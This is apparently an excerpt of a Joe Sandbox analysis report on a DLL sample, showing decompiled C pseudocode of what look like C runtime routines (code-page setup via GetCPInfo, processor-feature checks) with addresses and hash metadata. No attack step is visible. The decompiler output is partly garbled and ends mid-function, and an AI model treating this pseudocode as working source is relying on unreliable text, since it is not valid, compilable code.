                                                                      				if (_t157 - _t131 < 0) goto 0x80045b22;
                                                                      				if (_t157 - 0xffffffff >= 0) goto 0x80045b22;
                                                                      				r8d = 8;
                                                                      				E00000001180046590(_t46, _t131, _t182, _t157, _t162, _t164, _t175);
                                                                      				_t48 = E0000000118003F8F4(0xffffffff, _t182);
                                                                      				if (0xffffffff == 0) goto 0x80045b22;
                                                                      				 *((long long*)(0xffffffff + _t131 * 8)) = _t186;
                                                                      				 *((long long*)(0xffffffff + 8 + _t131 * 8)) = _t162;
                                                                      				 *0x800717a0 = 0xffffffff;
                                                                      				if (_a16 == 0) goto 0x80045d78;
                                                                      				_t185 = (_t164 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)(_t186 + (_t164 | 0xffffffff) + 1)) != sil) goto 0x80045ce9;
                                                                      				E00000001180042404(_t48, (_t164 | 0xffffffff) + 3, _t157, __r10);
                                                                      				if (0xffffffff != 0) goto 0x80045d11;
                                                                      				E0000000118003F8F4(0xffffffff, (_t164 | 0xffffffff) + 3);
                                                                      				goto 0x80045d64;
                                                                      				if (E0000000118003C47C(0xffffffff, 0xffffffff, _t185 + 2, _t186) != 0) goto 0x80045db3;
                                                                      				_t28 = _t176 + 1; // 0x1
                                                                      				_t119 = 0xffffffff - _t186;
                                                                      				_a8 =  ~_a8;
                                                                      				asm("dec eax");
                                                                      				 *((intOrPtr*)(_t28 + _t119 - 1)) = sil;
                                                                      				if (E00000001180053234(0, E0000000118003C47C(0xffffffff, 0xffffffff, _t185 + 2, _t186), 0xffffffff, 0xffffffff, _t185 + 0x00000002 & _t28 + _t119, _t162, _t162, _t186, _t171, __r10) != 0) goto 0x80045d70;
                                                                      				E00000001180013B18(_t119);
                                                                      				 *_t119 = 0x2a;
                                                                      				E0000000118003F8F4(_t119, 0xffffffff);
                                                                      				E0000000118003F8F4(_t119, _t162);
                                                                      				goto 0x80045d9b;
                                                                      				E0000000118003F8F4(_t119, 0xffffffff);
                                                                      				E0000000118003F8F4(_t119, _t162);
                                                                      				goto 0x80045d9b;
                                                                      				E00000001180013B18(_t119);
                                                                      				 *_t119 = 0x16;
                                                                      				return E0000000118003F8F4(_t119, _t186);
                                                                      			}






































                                                                      0x180045a70
                                                                      0x180045a70
                                                                      0x180045a75
                                                                      0x180045a8c
                                                                      0x180045a92
                                                                      0x180045a94
                                                                      0x180045a99
                                                                      0x180045a9f
                                                                      0x180045aac
                                                                      0x180045ab1
                                                                      0x180045ab7
                                                                      0x180045ac0
                                                                      0x180045ac6
                                                                      0x180045acd
                                                                      0x180045ad4
                                                                      0x180045ad8
                                                                      0x180045add
                                                                      0x180045ae2
                                                                      0x180045aea
                                                                      0x180045af1
                                                                      0x180045afa
                                                                      0x180045b02
                                                                      0x180045b04
                                                                      0x180045b0b
                                                                      0x180045b0d
                                                                      0x180045b15
                                                                      0x180045b17
                                                                      0x180045b1c
                                                                      0x180045b22
                                                                      0x180045b29
                                                                      0x180045b30
                                                                      0x180045b35
                                                                      0x180045b3c
                                                                      0x180045b43
                                                                      0x180045b48
                                                                      0x180045b50
                                                                      0x180045b57
                                                                      0x180045b5c
                                                                      0x180045b6a
                                                                      0x180045b71
                                                                      0x180045b78
                                                                      0x180045b7d
                                                                      0x180045b87
                                                                      0x180045b89
                                                                      0x180045b90
                                                                      0x180045b9a
                                                                      0x180045ba1
                                                                      0x180045ba8
                                                                      0x180045bad
                                                                      0x180045bb4
                                                                      0x180045bba
                                                                      0x180045bc4
                                                                      0x180045bd0
                                                                      0x180045bd3
                                                                      0x180045bd9
                                                                      0x180045beb
                                                                      0x180045bed
                                                                      0x180045bf5
                                                                      0x180045bfb
                                                                      0x180045c04
                                                                      0x180045c0d
                                                                      0x180045c16
                                                                      0x180045c1c
                                                                      0x180045c21
                                                                      0x180045c27
                                                                      0x180045c2f
                                                                      0x180045c31
                                                                      0x180045c35
                                                                      0x180045c3a
                                                                      0x180045c3a
                                                                      0x180045c3f
                                                                      0x180045c4a
                                                                      0x180045c4c
                                                                      0x180045c58
                                                                      0x180045c5f
                                                                      0x180045c62
                                                                      0x180045c6a
                                                                      0x180045c6c
                                                                      0x180045c73
                                                                      0x180045c78
                                                                      0x180045c7c
                                                                      0x180045c81
                                                                      0x180045c84
                                                                      0x180045c84
                                                                      0x180045c8b
                                                                      0x180045c9e
                                                                      0x180045ca4
                                                                      0x180045cad
                                                                      0x180045cb7
                                                                      0x180045cbf
                                                                      0x180045cc5
                                                                      0x180045cc9
                                                                      0x180045cce
                                                                      0x180045cdc
                                                                      0x180045ce9
                                                                      0x180045cf0
                                                                      0x180045cfb
                                                                      0x180045d06
                                                                      0x180045d0a
                                                                      0x180045d0f
                                                                      0x180045d22
                                                                      0x180045d2b
                                                                      0x180045d2f
                                                                      0x180045d35
                                                                      0x180045d39
                                                                      0x180045d3f
                                                                      0x180045d4d
                                                                      0x180045d4f
                                                                      0x180045d57
                                                                      0x180045d5d
                                                                      0x180045d67
                                                                      0x180045d6e
                                                                      0x180045d73
                                                                      0x180045d7b
                                                                      0x180045d82
                                                                      0x180045d84
                                                                      0x180045d8c
                                                                      0x180045db2

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                      • String ID:
                                                                      • API String ID: 1010374628-0
                                                                      • Opcode ID: b3ee59a9528be6893582e2973beae5d5f6af186144a4511ace1369af3a77f48e
                                                                      • Instruction ID: ca221ad25f561241e1c31062f56c559bc31a5dd54541590568dbc1a46adcb9e5
                                                                      • Opcode Fuzzy Hash: b3ee59a9528be6893582e2973beae5d5f6af186144a4511ace1369af3a77f48e
                                                                      • Instruction Fuzzy Hash: 7502E331705F4C44FAEBAB15A4813EA2790AB0DBD9F56C625BE99473D2EF39C6098304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0000000118004972C(signed long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __r10) {
                                                                      				void* __rdi;
                                                                      				signed int _t134;
                                                                      				signed int _t156;
                                                                      				void* _t173;
                                                                      				signed int _t189;
                                                                      				signed int _t195;
                                                                      				void* _t200;
                                                                      				signed long long _t238;
                                                                      				signed long long _t239;
                                                                      				signed int _t240;
                                                                      				long long _t241;
                                                                      				signed long long _t242;
                                                                      				long long _t244;
                                                                      				long long _t253;
                                                                      				signed char* _t261;
                                                                      				long long _t265;
                                                                      				void* _t267;
                                                                      				signed long long _t280;
                                                                      				void* _t283;
                                                                      				signed char* _t290;
                                                                      				long long _t295;
                                                                      				long long _t297;
                                                                      				signed long long _t298;
                                                                      				void* _t300;
                                                                      				signed long long _t301;
                                                                      				char* _t305;
                                                                      				void* _t314;
                                                                      				signed long long _t317;
                                                                      				signed long long _t320;
                                                                      				void* _t321;
                                                                      				signed long long _t324;
                                                                      				int _t326;
                                                                      				intOrPtr* _t327;
                                                                      
                                                                      				_t311 = __r10;
                                                                      				_t295 = __rsi;
                                                                      				_t283 = __rdx;
                                                                      				_t253 = __rbx;
                                                                      				_t314 = _t300;
                                                                      				 *((long long*)(_t314 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t314 + 0x18)) = _t297;
                                                                      				 *((long long*)(_t314 + 0x20)) = __rsi;
                                                                      				_t301 = _t300 - 0xa0;
                                                                      				_t238 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t239 = _t238 ^ _t301;
                                                                      				 *(_t301 + 0x98) = _t239;
                                                                      				 *((long long*)(_t314 - 0x58)) = __rcx;
                                                                      				 *((long long*)(_t314 - 0x50)) = __rbx;
                                                                      				r13d = 0;
                                                                      				r14d = 0;
                                                                      				r12d = 0;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x138)) == 0) goto 0x80049d0f;
                                                                      				_t327 = __rcx + 0xc;
                                                                      				 *(_t301 + 0x58) = __rbx;
                                                                      				_t10 = _t253 + 1; // 0x1
                                                                      				_t200 = _t10;
                                                                      				if ( *_t327 != 0) goto 0x800497b4;
                                                                      				 *((long long*)(_t301 + 0x20)) = _t327;
                                                                      				r9d = 0x1004;
                                                                      				if (E000000011800548F8(_t173, 0, _t314 - 0x58,  *((intOrPtr*)(__rcx + 0x138)), __r10) != 0) goto 0x80049cdf;
                                                                      				_t257 = __rsi;
                                                                      				E00000001180042404(_t120, __rsi, _t283, __r10);
                                                                      				 *(_t301 + 0x58) = _t239;
                                                                      				E00000001180042404(E0000000118003F8F4(_t239, __rsi), __rsi, _t283, __r10);
                                                                      				_t320 = _t239;
                                                                      				E00000001180042404(E0000000118003F8F4(_t239, __rsi), _t257, __rsi, __r10);
                                                                      				_t324 = _t239;
                                                                      				E00000001180042404(E0000000118003F8F4(_t239, _t257), _t257, __rsi, _t311);
                                                                      				_t298 = _t239;
                                                                      				E00000001180042404(E0000000118003F8F4(_t239, _t257), _t257, __rsi, _t311);
                                                                      				_t317 = _t239;
                                                                      				E0000000118003F8F4(_t239, _t257);
                                                                      				if ( *(_t301 + 0x58) == __rbx) goto 0x80049cdf;
                                                                      				if (_t320 == 0) goto 0x80049cdf;
                                                                      				if (_t317 == 0) goto 0x80049cdf;
                                                                      				if (_t324 == 0) goto 0x80049cdf;
                                                                      				if (_t298 == 0) goto 0x80049cdf;
                                                                      				 *_t317 = 0;
                                                                      				if (0 + _t200 - 0x100 < 0) goto 0x8004985b;
                                                                      				if (GetCPInfo(_t326) == 0) goto 0x80049cdf;
                                                                      				if ( *(_t301 + 0x80) - 5 > 0) goto 0x80049cdf;
                                                                      				_t134 =  *(_t301 + 0x80) & 0x0000ffff;
                                                                      				 *(_t301 + 0x50) = _t134;
                                                                      				if (_t134 - _t200 <= 0) goto 0x800498fb;
                                                                      				if ( *_t327 != 0xfde9) goto 0x800498c0;
                                                                      				_t19 = _t317 + 0x80; // 0x80
                                                                      				r8d = 0x80;
                                                                      				E000000011800046A0(_t134, 0x20, _t19, _t301 + 0x80,  *((intOrPtr*)(__rcx + 0x138)));
                                                                      				goto 0x800498fb;
                                                                      				_t261 = _t301 + 0x86;
                                                                      				if ( *((intOrPtr*)(_t301 + 0x86)) == 0) goto 0x800498fb;
                                                                      				if (_t261[1] == 0) goto 0x800498fb;
                                                                      				_t195 =  *_t261 & 0x000000ff;
                                                                      				if (_t195 - (_t261[1] & 0x000000ff) > 0) goto 0x800498f3;
                                                                      				_t240 = _t195;
                                                                      				 *((char*)(_t240 + _t317)) = 0x20;
                                                                      				if (_t195 + _t200 - (_t261[1] & 0x000000ff) <= 0) goto 0x800498e1;
                                                                      				if (_t261[2] != 0) goto 0x800498d1;
                                                                      				_t26 = _t324 + 0x81; // 0x81
                                                                      				_t28 = _t317 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t301 + 0x40)) = 0;
                                                                      				 *((intOrPtr*)(_t301 + 0x38)) =  *_t327;
                                                                      				 *((intOrPtr*)(_t301 + 0x30)) = 0xff;
                                                                      				 *((long long*)(_t301 + 0x28)) = _t26;
                                                                      				 *((intOrPtr*)(_t301 + 0x20)) = 0xff;
                                                                      				_t34 = _t240 + 1; // 0x100
                                                                      				r8d = _t34;
                                                                      				if (E00000001180052F2C(0, _t195 + _t200, _t200, _t261[2], _t240, __rbx, _t26,  *((intOrPtr*)(__rcx + 0x138)), __rsi, _t28, _t311) == 0) goto 0x80049cdf;
                                                                      				_t35 = _t298 + 0x81; // 0x81
                                                                      				_t37 = _t317 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t301 + 0x40)) = 0;
                                                                      				r8d = 0x200;
                                                                      				 *((intOrPtr*)(_t301 + 0x38)) =  *_t327;
                                                                      				 *((intOrPtr*)(_t301 + 0x30)) = 0xff;
                                                                      				 *((long long*)(_t301 + 0x28)) = _t35;
                                                                      				 *((intOrPtr*)(_t301 + 0x20)) = 0xff;
                                                                      				if (E00000001180052F2C(0, _t195 + _t200, _t200, E00000001180052F2C(0, _t195 + _t200, _t200, _t261[2], _t240, __rbx, _t26,  *((intOrPtr*)(__rcx + 0x138)), __rsi, _t28, _t311), _t240, _t253, _t35,  *((intOrPtr*)(__rcx + 0x138)), _t295, _t37, _t311) == 0) goto 0x80049cdf;
                                                                      				_t43 = _t320 + 0x100; // 0x100
                                                                      				_t265 = _t43;
                                                                      				 *((intOrPtr*)(_t301 + 0x30)) = 0;
                                                                      				r9d = 0x100;
                                                                      				 *((intOrPtr*)(_t301 + 0x28)) =  *_t327;
                                                                      				 *((long long*)(_t301 + 0x60)) = _t265;
                                                                      				 *((long long*)(_t301 + 0x20)) = _t265;
                                                                      				if (E0000000118004B3EC(_t200, E00000001180052F2C(0, _t195 + _t200, _t200, E00000001180052F2C(0, _t195 + _t200, _t200, _t261[2], _t240, __rbx, _t26,  *((intOrPtr*)(__rcx + 0x138)), __rsi, _t28, _t311), _t240, _t253, _t35,  *((intOrPtr*)(__rcx + 0x138)), _t295, _t37, _t311), _t253, _t265, __rcx, _t295, _t317, _t311) == 0) goto 0x80049cdf;
                                                                      				_t48 = _t320 + 0xfe; // 0xfe
                                                                      				_t241 = _t48;
                                                                      				 *_t241 = 0;
                                                                      				 *((char*)(_t324 + 0x7f)) = 0;
                                                                      				 *((char*)(_t298 + 0x7f)) = 0;
                                                                      				 *((char*)(_t324 + 0x80)) = 0;
                                                                      				 *((char*)(_t298 + 0x80)) = 0;
                                                                      				 *((long long*)(_t301 + 0x68)) = _t241;
                                                                      				if ( *(_t301 + 0x50) - _t200 <= 0) goto 0x80049a90;
                                                                      				if ( *_t327 != 0xfde9) goto 0x80049a3c;
                                                                      				_t55 = _t298 + 0x100; // 0x100
                                                                      				_t305 = _t55;
                                                                      				_t56 = _t320 + 0x200; // 0x200
                                                                      				r11d = 0x8000;
                                                                      				_t188 =  >  ? 0 : r11d;
                                                                      				 *_t56 =  >  ? 0 : r11d;
                                                                      				 *((char*)(_t324 - _t298 + _t305)) = 0x20;
                                                                      				 *_t305 = 0x80;
                                                                      				if (0x80 + _t200 - 0xff <= 0) goto 0x80049a0e;
                                                                      				goto 0x80049a90;
                                                                      				_t290 = _t301 + 0x86;
                                                                      				if ( *((intOrPtr*)(_t301 + 0x86)) == 0) goto 0x80049a90;
                                                                      				r11d = 0x8000;
                                                                      				if (_t290[1] == 0) goto 0x80049a90;
                                                                      				_t189 =  *_t290 & 0x000000ff;
                                                                      				if (_t189 - (_t290[1] & 0x000000ff) > 0) goto 0x80049a88;
                                                                      				_t242 = _t189;
                                                                      				 *((intOrPtr*)(_t320 + 0x100 + _t242 * 2)) = r11w;
                                                                      				 *(_t242 + _t324 + 0x80) = _t189;
                                                                      				 *(_t242 + _t298 + 0x80) = _t189;
                                                                      				if (_t189 + _t200 - (_t290[1] & 0x000000ff) <= 0) goto 0x80049a63;
                                                                      				if (_t290[2] != 0) goto 0x80049a53;
                                                                      				_t72 = _t320 + 0x200; // 0x200
                                                                      				asm("movups xmm0, [ecx]");
                                                                      				asm("movups xmm1, [ecx+0x10]");
                                                                      				_t267 = _t72 + 0x80;
                                                                      				asm("inc ecx");
                                                                      				_t243 =  *((intOrPtr*)(_t267 + 0x70));
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx-0x60]");
                                                                      				asm("movups xmm1, [ecx-0x50]");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx-0x40]");
                                                                      				asm("movups xmm1, [ecx-0x30]");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx-0x20]");
                                                                      				asm("movups xmm1, [ecx-0x10]");
                                                                      				asm("inc ecx");
                                                                      				_t321 = _t320 - 0xffffff80;
                                                                      				asm("movups xmm0, [ecx]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [ecx+0x10]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx+0x20]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [ecx+0x30]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx+0x40]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [ecx+0x50]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx+0x60]");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				 *((long long*)(_t321 + 0x70)) =  *((intOrPtr*)(_t267 + 0x70));
                                                                      				 *((intOrPtr*)(_t321 + 0x78)) =  *((intOrPtr*)(_t267 + 0x78));
                                                                      				 *((short*)(_t321 + 0x7c)) =  *(_t267 + 0x7c) & 0x0000ffff;
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("repne inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("repne inc ecx");
                                                                      				 *((intOrPtr*)(_t324 + 0x78)) =  *((intOrPtr*)(_t324 + 0x178));
                                                                      				 *((short*)(_t324 + 0x7c)) =  *(_t324 + 0x17c) & 0x0000ffff;
                                                                      				 *((char*)(_t324 + 0x7e)) =  *((intOrPtr*)(_t324 + 0x17e));
                                                                      				asm("movups xmm0, [ebp+0x100]");
                                                                      				asm("movups xmm1, [ebp+0x110]");
                                                                      				asm("movups [ebp], xmm0");
                                                                      				asm("movups xmm0, [ebp+0x120]");
                                                                      				asm("movups [ebp+0x10], xmm1");
                                                                      				asm("movups xmm1, [ebp+0x130]");
                                                                      				asm("movups [ebp+0x20], xmm0");
                                                                      				asm("movups xmm0, [ebp+0x140]");
                                                                      				asm("movups [ebp+0x30], xmm1");
                                                                      				asm("movups xmm1, [ebp+0x150]");
                                                                      				asm("movups [ebp+0x40], xmm0");
                                                                      				asm("movups xmm0, [ebp+0x160]");
                                                                      				asm("movups [ebp+0x50], xmm1");
                                                                      				asm("movsd xmm1, [ebp+0x170]");
                                                                      				asm("movups [ebp+0x60], xmm0");
                                                                      				asm("movsd [ebp+0x70], xmm1");
                                                                      				 *((intOrPtr*)(_t298 + 0x78)) =  *((intOrPtr*)(_t298 + 0x178));
                                                                      				 *((short*)(_t298 + 0x7c)) =  *(_t298 + 0x17c) & 0x0000ffff;
                                                                      				_t156 =  *((intOrPtr*)(_t298 + 0x17e));
                                                                      				 *(_t298 + 0x7e) = _t156;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x100)) == 0) goto 0x80049c98;
                                                                      				asm("lock xadd [ecx], eax");
                                                                      				if ((_t156 | 0xffffffff) != _t200) goto 0x80049c98;
                                                                      				E0000000118003F8F4( *((intOrPtr*)(_t267 + 0x70)),  *((intOrPtr*)(__rcx + 0x108)) - 0xfe);
                                                                      				E0000000118003F8F4( *((intOrPtr*)(_t267 + 0x70)),  *((intOrPtr*)(__rcx + 0x110)) + 0xffffff80);
                                                                      				E0000000118003F8F4( *((intOrPtr*)(_t267 + 0x70)),  *((intOrPtr*)(__rcx + 0x118)) + 0xffffff80);
                                                                      				E0000000118003F8F4(_t243,  *((intOrPtr*)(__rcx + 0x100)));
                                                                      				_t244 =  *(_t301 + 0x58);
                                                                      				 *_t244 = _t200;
                                                                      				 *((long long*)(__rcx + 0x100)) = _t244;
                                                                      				 *((long long*)(__rcx)) =  *((intOrPtr*)(_t301 + 0x60));
                                                                      				 *((long long*)(__rcx + 0x108)) =  *((intOrPtr*)(_t301 + 0x68));
                                                                      				_t102 = _t324 + 0x80; // 0x80
                                                                      				 *((long long*)(__rcx + 0x110)) = _t102;
                                                                      				_t104 = _t298 + 0x80; // 0x80
                                                                      				_t248 = _t104;
                                                                      				 *((long long*)(__rcx + 0x118)) = _t104;
                                                                      				 *(__rcx + 8) =  *(_t301 + 0x50);
                                                                      				goto 0x80049d03;
                                                                      				E0000000118003F8F4(_t104,  *(_t301 + 0x58));
                                                                      				E0000000118003F8F4(_t104, _t321);
                                                                      				E0000000118003F8F4(_t104, _t324);
                                                                      				E0000000118003F8F4(_t248, _t298);
                                                                      				_t280 = _t317;
                                                                      				E0000000118003F8F4(_t248, _t280);
                                                                      				goto 0x80049d5c;
                                                                      				if ( *((intOrPtr*)(_t280 + 0x100)) == 0) goto 0x80049d1e;
                                                                      				asm("lock dec dword [eax]");
                                                                      				 *((long long*)(_t280 + 0x100)) = _t253;
                                                                      				 *_t280 = 0x80060ae0;
                                                                      				 *((long long*)(_t280 + 0x108)) = _t253;
                                                                      				 *((long long*)(_t280 + 0x110)) = 0x80060d60;
                                                                      				 *((long long*)(_t280 + 0x118)) = 0x80060ee0;
                                                                      				 *((intOrPtr*)(_t280 + 8)) = 1;
                                                                      				return E000000011800028F0(0, _t189 + _t200,  *(_t301 + 0x98) ^ _t301);
                                                                      			}




































                                                                      0x18004972c
                                                                      0x18004972c
                                                                      0x18004972c
                                                                      0x18004972c
                                                                      0x18004972c
                                                                      0x18004972f
                                                                      0x180049733
                                                                      0x180049737
                                                                      0x180049744
                                                                      0x18004974b
                                                                      0x180049752
                                                                      0x180049755
                                                                      0x180049766
                                                                      0x18004976d
                                                                      0x180049771
                                                                      0x180049774
                                                                      0x180049779
                                                                      0x18004977f
                                                                      0x180049785
                                                                      0x180049789
                                                                      0x18004978e
                                                                      0x18004978e
                                                                      0x180049794
                                                                      0x180049798
                                                                      0x18004979d
                                                                      0x1800497ae
                                                                      0x1800497b9
                                                                      0x1800497bc
                                                                      0x1800497c3
                                                                      0x1800497d9
                                                                      0x1800497e0
                                                                      0x1800497ed
                                                                      0x1800497f4
                                                                      0x180049801
                                                                      0x180049808
                                                                      0x180049818
                                                                      0x18004981f
                                                                      0x180049822
                                                                      0x18004982c
                                                                      0x180049835
                                                                      0x18004983e
                                                                      0x180049847
                                                                      0x180049850
                                                                      0x18004985b
                                                                      0x180049867
                                                                      0x18004987c
                                                                      0x18004988a
                                                                      0x180049890
                                                                      0x180049898
                                                                      0x18004989e
                                                                      0x1800498a7
                                                                      0x1800498a9
                                                                      0x1800498b1
                                                                      0x1800498b9
                                                                      0x1800498be
                                                                      0x1800498c0
                                                                      0x1800498cf
                                                                      0x1800498d4
                                                                      0x1800498d6
                                                                      0x1800498df
                                                                      0x1800498e1
                                                                      0x1800498e6
                                                                      0x1800498f1
                                                                      0x1800498f9
                                                                      0x1800498fe
                                                                      0x18004990c
                                                                      0x180049911
                                                                      0x180049915
                                                                      0x18004991e
                                                                      0x180049922
                                                                      0x180049929
                                                                      0x18004992d
                                                                      0x18004992d
                                                                      0x180049938
                                                                      0x180049941
                                                                      0x18004994f
                                                                      0x180049954
                                                                      0x180049958
                                                                      0x18004995e
                                                                      0x180049967
                                                                      0x18004996b
                                                                      0x180049972
                                                                      0x18004997d
                                                                      0x180049986
                                                                      0x180049986
                                                                      0x18004998d
                                                                      0x180049991
                                                                      0x180049997
                                                                      0x18004999e
                                                                      0x1800499a5
                                                                      0x1800499b3
                                                                      0x1800499b9
                                                                      0x1800499b9
                                                                      0x1800499c0
                                                                      0x1800499c3
                                                                      0x1800499c7
                                                                      0x1800499ca
                                                                      0x1800499d1
                                                                      0x1800499d7
                                                                      0x1800499e0
                                                                      0x1800499ed
                                                                      0x1800499f2
                                                                      0x1800499f2
                                                                      0x1800499fc
                                                                      0x180049a08
                                                                      0x180049a1a
                                                                      0x180049a1e
                                                                      0x180049a26
                                                                      0x180049a2a
                                                                      0x180049a38
                                                                      0x180049a3a
                                                                      0x180049a3c
                                                                      0x180049a4b
                                                                      0x180049a4d
                                                                      0x180049a56
                                                                      0x180049a58
                                                                      0x180049a61
                                                                      0x180049a63
                                                                      0x180049a66
                                                                      0x180049a6f
                                                                      0x180049a77
                                                                      0x180049a86
                                                                      0x180049a8e
                                                                      0x180049a90
                                                                      0x180049a97
                                                                      0x180049a9a
                                                                      0x180049a9e
                                                                      0x180049aa5
                                                                      0x180049aaa
                                                                      0x180049aae
                                                                      0x180049ab3
                                                                      0x180049ab7
                                                                      0x180049abb
                                                                      0x180049ac0
                                                                      0x180049ac5
                                                                      0x180049ac9
                                                                      0x180049acd
                                                                      0x180049ad2
                                                                      0x180049ad7
                                                                      0x180049adb
                                                                      0x180049adf
                                                                      0x180049ae4
                                                                      0x180049ae8
                                                                      0x180049aeb
                                                                      0x180049af0
                                                                      0x180049af4
                                                                      0x180049af9
                                                                      0x180049afd
                                                                      0x180049b02
                                                                      0x180049b06
                                                                      0x180049b0b
                                                                      0x180049b0f
                                                                      0x180049b14
                                                                      0x180049b18
                                                                      0x180049b1d
                                                                      0x180049b21
                                                                      0x180049b26
                                                                      0x180049b2b
                                                                      0x180049b32
                                                                      0x180049b3a
                                                                      0x180049b46
                                                                      0x180049b4e
                                                                      0x180049b56
                                                                      0x180049b5a
                                                                      0x180049b62
                                                                      0x180049b67
                                                                      0x180049b6f
                                                                      0x180049b74
                                                                      0x180049b7c
                                                                      0x180049b81
                                                                      0x180049b89
                                                                      0x180049b8e
                                                                      0x180049b96
                                                                      0x180049b9b
                                                                      0x180049ba4
                                                                      0x180049ba9
                                                                      0x180049baf
                                                                      0x180049bbb
                                                                      0x180049bc7
                                                                      0x180049bcb
                                                                      0x180049bd8
                                                                      0x180049bdf
                                                                      0x180049be3
                                                                      0x180049bea
                                                                      0x180049bee
                                                                      0x180049bf5
                                                                      0x180049bf9
                                                                      0x180049c00
                                                                      0x180049c04
                                                                      0x180049c0b
                                                                      0x180049c0f
                                                                      0x180049c16
                                                                      0x180049c1a
                                                                      0x180049c22
                                                                      0x180049c26
                                                                      0x180049c2b
                                                                      0x180049c35
                                                                      0x180049c39
                                                                      0x180049c3f
                                                                      0x180049c4c
                                                                      0x180049c51
                                                                      0x180049c57
                                                                      0x180049c67
                                                                      0x180049c77
                                                                      0x180049c87
                                                                      0x180049c93
                                                                      0x180049c98
                                                                      0x180049c9d
                                                                      0x180049c9f
                                                                      0x180049cab
                                                                      0x180049cb3
                                                                      0x180049cba
                                                                      0x180049cc1
                                                                      0x180049cc8
                                                                      0x180049cc8
                                                                      0x180049ccf
                                                                      0x180049cda
                                                                      0x180049cdd
                                                                      0x180049ce4
                                                                      0x180049cec
                                                                      0x180049cf4
                                                                      0x180049cfc
                                                                      0x180049d03
                                                                      0x180049d06
                                                                      0x180049d0d
                                                                      0x180049d19
                                                                      0x180049d1b
                                                                      0x180049d25
                                                                      0x180049d2c
                                                                      0x180049d3b
                                                                      0x180049d42
                                                                      0x180049d50
                                                                      0x180049d59
                                                                      0x180049d8c

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-0
                                                                      • Opcode ID: 55fe41d53e6c484fc1ceb92799177152727eb43c930dc2fc9ad1619ee7c851c2
                                                                      • Instruction ID: 56407d68161fc1760d017e35870896b9ab736a6d1751f3f58bff1703f3672a36
                                                                      • Opcode Fuzzy Hash: 55fe41d53e6c484fc1ceb92799177152727eb43c930dc2fc9ad1619ee7c851c2
                                                                      • Instruction Fuzzy Hash: A0129F32A09BC886E792CF2894847ED73A4F75D788F16D225EF9853652EF35D689C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00000001180049EEC(intOrPtr* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _v40;
                                                                      				signed int _v48;
                                                                      				char _v56;
                                                                      				long long _v72;
                                                                      				void* _t114;
                                                                      				void* _t120;
                                                                      				signed int _t152;
                                                                      				char _t182;
                                                                      				char _t183;
                                                                      				long long _t213;
                                                                      				intOrPtr* _t224;
                                                                      				intOrPtr* _t242;
                                                                      				char* _t296;
                                                                      				char* _t297;
                                                                      				char* _t329;
                                                                      				void* _t331;
                                                                      				long long _t334;
                                                                      				void* _t335;
                                                                      				intOrPtr* _t336;
                                                                      				long long _t338;
                                                                      				signed long long _t339;
                                                                      				long long _t340;
                                                                      
